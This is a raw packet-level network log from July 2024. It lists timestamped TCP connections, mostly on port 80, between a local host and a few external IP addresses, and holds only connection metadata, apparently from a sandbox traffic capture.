                                                                Jul 5, 2024 04:36:13.751518011 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751528025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751542091 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751571894 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751666069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751698017 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751707077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751718044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751737118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751739979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751746893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751765966 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751765966 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751774073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751776934 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751782894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751787901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751789093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751796007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751801968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751807928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751813889 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751822948 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751849890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:16.457324028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:16.457385063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:19.587949991 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:19.589018106 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:37:02.772203922 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:02.780970097 CEST804974477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:02.781059027 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:02.781207085 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:02.785918951 CEST804974477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:03.483335018 CEST804974477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:03.484009027 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.484728098 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.489500046 CEST804974477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:03.706686020 CEST804974477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:03.706768036 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.810154915 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.810482979 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.815319061 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:03.815366030 CEST804974477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:03.815407038 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.815437078 CEST4974480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.815567017 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:03.820709944 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:04.524879932 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:04.524951935 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.525564909 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.530289888 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:04.751014948 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:04.751101017 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.857656956 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.857984066 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.862704992 CEST804974577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:04.862718105 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:04.862762928 CEST4974580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.862787962 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.862938881 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:04.867597103 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:05.556626081 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:05.556693077 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.557482958 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.564338923 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:05.774699926 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:05.774774075 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.888195038 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.888560057 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.896867037 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:05.896924973 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.897123098 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:05.897187948 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.897336960 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:05.905710936 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:06.622106075 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:06.622191906 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.622920036 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.628421068 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:06.845200062 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:06.845256090 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.950741053 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.951049089 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.955863953 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:06.955876112 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:06.955933094 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.955965042 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.956135988 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:06.960892916 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:07.665767908 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:07.665929079 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:07.666536093 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:07.671267986 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:07.886657953 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:07.886754990 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.000705004 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.001317024 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.008970022 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:08.008985043 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:08.009080887 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.009118080 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.010957003 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.018740892 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:08.701706886 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:08.701889992 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.702505112 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:08.713701010 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:08.927601099 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:08.927655935 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.029079914 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.029325008 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.034167051 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:09.034233093 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:09.034269094 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.034284115 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.034369946 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.039109945 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:09.733145952 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:09.733201981 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.736301899 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:09.741174936 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:09.952419043 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:09.952512980 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.060156107 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.060467005 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.065639973 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:10.065701962 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.065789938 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.066009998 CEST804975077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:10.066056967 CEST4975080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.070486069 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:10.777014971 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:10.778096914 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.793365955 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:10.798130989 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:11.017653942 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:11.017714024 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.125966072 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.126267910 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.132473946 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:11.132550955 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.132577896 CEST804975177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:11.132628918 CEST4975180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.132740021 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.137530088 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:11.847768068 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:11.847851992 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.848656893 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:11.854228020 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:12.075551987 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:12.075613976 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.185122967 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.185524940 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.190257072 CEST804975277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:12.190298080 CEST804975377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:12.190323114 CEST4975280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.190391064 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.190593004 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.195282936 CEST804975377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:12.903009892 CEST804975377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:12.903194904 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.903976917 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:12.909189939 CEST804975377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:13.126121044 CEST804975377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:13.126178026 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.231971025 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.232283115 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.247127056 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:13.247194052 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.247462034 CEST804975377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:13.247471094 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.247504950 CEST4975380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.255099058 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:13.965364933 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:13.965455055 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.966722965 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:13.971719980 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:14.193650007 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:14.193706036 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:14.310192108 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:14.310564041 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:14.315315962 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:14.315407991 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:14.315562963 CEST804975477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:14.315563917 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:14.315613031 CEST4975480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:14.320302010 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:15.007656097 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:15.007704973 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.008673906 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.013452053 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:15.228898048 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:15.228981972 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.341466904 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.341820955 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.347362041 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:15.347439051 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.347579002 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.347749949 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:15.347804070 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:15.352912903 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:16.068268061 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:16.068502903 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.069252968 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.075179100 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:16.294476032 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:16.294534922 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.403877020 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.404230118 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.410768032 CEST804975777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:16.410845995 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.410980940 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.411114931 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:16.411166906 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:16.415700912 CEST804975777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:17.151032925 CEST804975777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:17.151097059 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.152453899 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.158917904 CEST804975777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:17.381314039 CEST804975777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:17.381382942 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.497653961 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.498003006 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.502819061 CEST804975777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:17.502839088 CEST804975877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:17.502893925 CEST4975780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.502940893 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.503124952 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:17.507893085 CEST804975877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:18.202924013 CEST804975877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:18.203000069 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.203722000 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.208524942 CEST804975877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:18.420727015 CEST804975877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:18.420819044 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.528846025 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.529161930 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.535083055 CEST804975877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:18.535144091 CEST4975880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.535195112 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:18.535257101 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.535423040 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:18.545042992 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:19.232672930 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:19.232743979 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.233426094 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.238154888 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:19.450366020 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:19.450443983 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.562545061 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.562860966 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.568011999 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:19.568063974 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.568094015 CEST804976077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:19.568160057 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.568286896 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:19.574968100 CEST804976077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:20.291481018 CEST804976077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:20.291536093 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.292093992 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.300225019 CEST804976077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:20.520787001 CEST804976077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:20.520869017 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.622632980 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.622956038 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.627841949 CEST804976077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:20.627855062 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:20.627917051 CEST4976080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.627947092 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.628113031 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:20.632833958 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:21.320779085 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:21.320857048 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.321603060 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.326591015 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:21.538017988 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:21.538094997 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.653875113 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.654155970 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.659164906 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:21.659235954 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.659364939 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.659401894 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:21.659451008 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:21.664252996 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:22.360511065 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:22.360572100 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.361375093 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.367336988 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:22.582298040 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:22.582346916 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.685378075 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.685698032 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.690526962 CEST804976377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:22.690846920 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:22.691169977 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.691179037 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.691457987 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:22.696248055 CEST804976377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:23.402371883 CEST804976377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:23.402498007 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.403130054 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.407943010 CEST804976377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:23.626060963 CEST804976377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:23.628041029 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.732070923 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.732351065 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.737153053 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:23.737202883 CEST804976377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:23.737219095 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.737256050 CEST4976380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.737446070 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:23.742805958 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:24.432148933 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:24.432218075 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.432959080 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.437861919 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:24.647975922 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:24.648052931 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.763297081 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.763601065 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.768474102 CEST804976577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:24.768553972 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.768671989 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.768758059 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:24.768805027 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:24.773410082 CEST804976577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:25.500371933 CEST804976577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:25.500443935 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.501020908 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.506587982 CEST804976577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:25.730277061 CEST804976577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:25.730370045 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.841496944 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.841845036 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.857033968 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:25.857045889 CEST804976577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:25.857130051 CEST4976580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.858331919 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:25.858331919 CEST4976680192.168.2.477.91.77.82
